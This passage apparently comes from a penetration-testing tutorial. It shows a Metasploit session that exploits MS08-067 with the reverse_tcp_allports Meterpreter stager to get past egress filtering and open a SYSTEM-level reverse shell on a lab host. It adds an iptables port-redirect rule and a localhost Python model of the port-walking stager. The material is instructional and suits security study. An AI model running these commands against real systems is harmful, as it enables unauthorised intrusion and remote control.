In the preceding examples, we've relied on the reverse port always being open. But what if we're attacking an organization with strict egress filtering? Many organizations block outbound connections except to a handful of approved destination ports, and from the inside it can be hard to tell which ports are allowed out.
We can guess that port 443 will be allowed out and, because HTTPS traffic is rarely inspected, that a plain TCP connection on it will get through; FTP, Telnet, SSH, and HTTP (21, 23, 22, and 80) may be allowed too. But why guess when Metasploit has a payload built specifically for finding an open egress port?
Metasploit's reverse_tcp_allports stager tries each destination port in turn, starting at LPORT (1 by default) and counting upward, until one connection succeeds. (Walking the entire port range [1–65535] can take a very long time, so expect a wait if the first allowed port is high.)
Let's use this payload and have it try each port outbound until one succeeds:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
lhost => 192.168.33.129
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
rhost => 192.168.33.130
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > search ports
[*] Searching loaded modules for pattern 'ports'...

Compatible Payloads
===================

   Name                                      Rank    Description
   ----                                      ----    -----------
   windows/dllinject/reverse_tcp_allports    normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_allports  normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
. . . SNIP . . .

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.33.129:1
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:1 -> 192.168.33.130:1047)

msf exploit(ms08_067_netapi) > sessions -l -v

Active sessions
===============

  Id  Type         Information                         Connection                               Via
  --  ----         -----------                         ----------                               ---
  1   meterpreter  NT AUTHORITY\SYSTEM @ IHAZSECURITY  192.168.33.129:1 -> 192.168.33.130:1047  exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
Notice that we do not set an LPORT; we leave it at its default of 1 and use the allports stager, which tries to connect out of the network on each port in turn until one gets through. Look closely at the handler and session lines: our attacker machine is listening on 192.168.33.129:1 only, and the session came in on that port. In this lab nothing blocked port 1, so the very first attempt succeeded. The 1047 on the target side (192.168.33.130:1047) is the ephemeral source port Windows chose for the connection, not a discovered egress port.
Against real egress filtering the stager keeps counting up until it reaches a destination port the firewall allows, such as 443, and the handler must be able to accept a connection on that port. Since the handler binds only LPORT, redirect the rest of the TCP port range on the attacker machine to LPORT before launching the exploit, for example with an iptables NAT rule such as iptables -t nat -A PREROUTING -p tcp --dport 1:65535 -j REDIRECT --to-ports 1, and remember that a full walk up to a high port can take hours.
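As an added example (not from the book and not Metasploit's own code), the Python below models what the allports stager does and what the handler sees on its side, with both ends on 127.0.0.1 so it runs offline. It assumes nothing listens on TCP ports 1 to 3 on the machine it runs on; those stand in for blocked egress ports. It also goes slightly beyond the real stager by fronting the probe list with the ports most often allowed out, which the Metasploit payload does not do.

```python
"""Model of the reverse_tcp_allports stager loop and the handler side.

Added example, not code from the book or from Metasploit. Both ends run on
127.0.0.1. Ports 1-3 are assumed closed on this host (nothing normally
listens there) and play the role of egress-blocked ports.
"""
import socket
import threading

HOST = "127.0.0.1"
# Constructed for the demo: assumed closed, so each probe is refused.
ASSUMED_CLOSED_PORTS = [1, 2, 3]


def start_handler(host=HOST):
    """Stand-in for the Metasploit handler: listen on ONE ephemeral port.

    Returns (listening_socket, port). Only this single port is bound,
    which is exactly the handler's situation on LPORT.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def try_port(host, port, timeout):
    """One connect attempt. Returns the connected socket, or None if the
    port refused, timed out, or was otherwise unreachable."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return s
    except OSError:  # ConnectionRefusedError and socket.timeout are OSErrors
        s.close()
        return None


def find_egress_port(host, ports, timeout=1.0):
    """The allports stager's loop: try each destination port in order and
    stop at the first one that completes a TCP handshake.

    Returns (port, connected_socket), or (None, None) if nothing connected.
    """
    for port in ports:
        s = try_port(host, port, timeout)
        if s is not None:
            return port, s
    return None, None


def candidate_ports(start=1, end=65535,
                    likely=(443, 80, 53, 22, 21, 23, 25, 8080)):
    """Probe order. The Metasploit stager simply walks start..end; putting
    the ports most often allowed out (443, 80, DNS, SSH, ...) first is a
    shortcut that usually finds the hole in seconds instead of hours."""
    seen = set()
    for p in list(likely) + list(range(start, end + 1)):
        if p not in seen:
            seen.add(p)
            yield p


def demo():
    """Run both ends on localhost.

    Returns (destination port the stager ended up on, port the handler
    listens on, (peer_ip, peer_port) as the handler saw the connection).
    """
    srv, lport = start_handler()
    srv.settimeout(5)
    seen = {}

    def accept_one():
        try:
            conn, peer = srv.accept()
            seen["peer"] = peer  # peer[1] is the client's ephemeral source port
            conn.close()
        except OSError:
            pass

    t = threading.Thread(target=accept_one, daemon=True)
    t.start()

    # Like the default LPORT=1 walk: low (blocked) ports first, then ours.
    port, sock = find_egress_port(HOST, ASSUMED_CLOSED_PORTS + [lport])
    t.join(5)
    if sock is not None:
        sock.close()
    srv.close()
    return port, lport, seen.get("peer")


if __name__ == "__main__":
    port, lport, peer = demo()
    print(f"stager connected on destination port {port} (handler on {lport})")
    print(f"handler saw the connection from {peer}: the second number is the")
    print("client's ephemeral source port, not the egress port that worked")
```

The value the handler reports as the peer port is the same kind of number as the 1047 in the session listing above: it is chosen by the target's TCP stack, and it tells you nothing about which destination port the firewall let through. The destination port that worked is the one the handler is bound to.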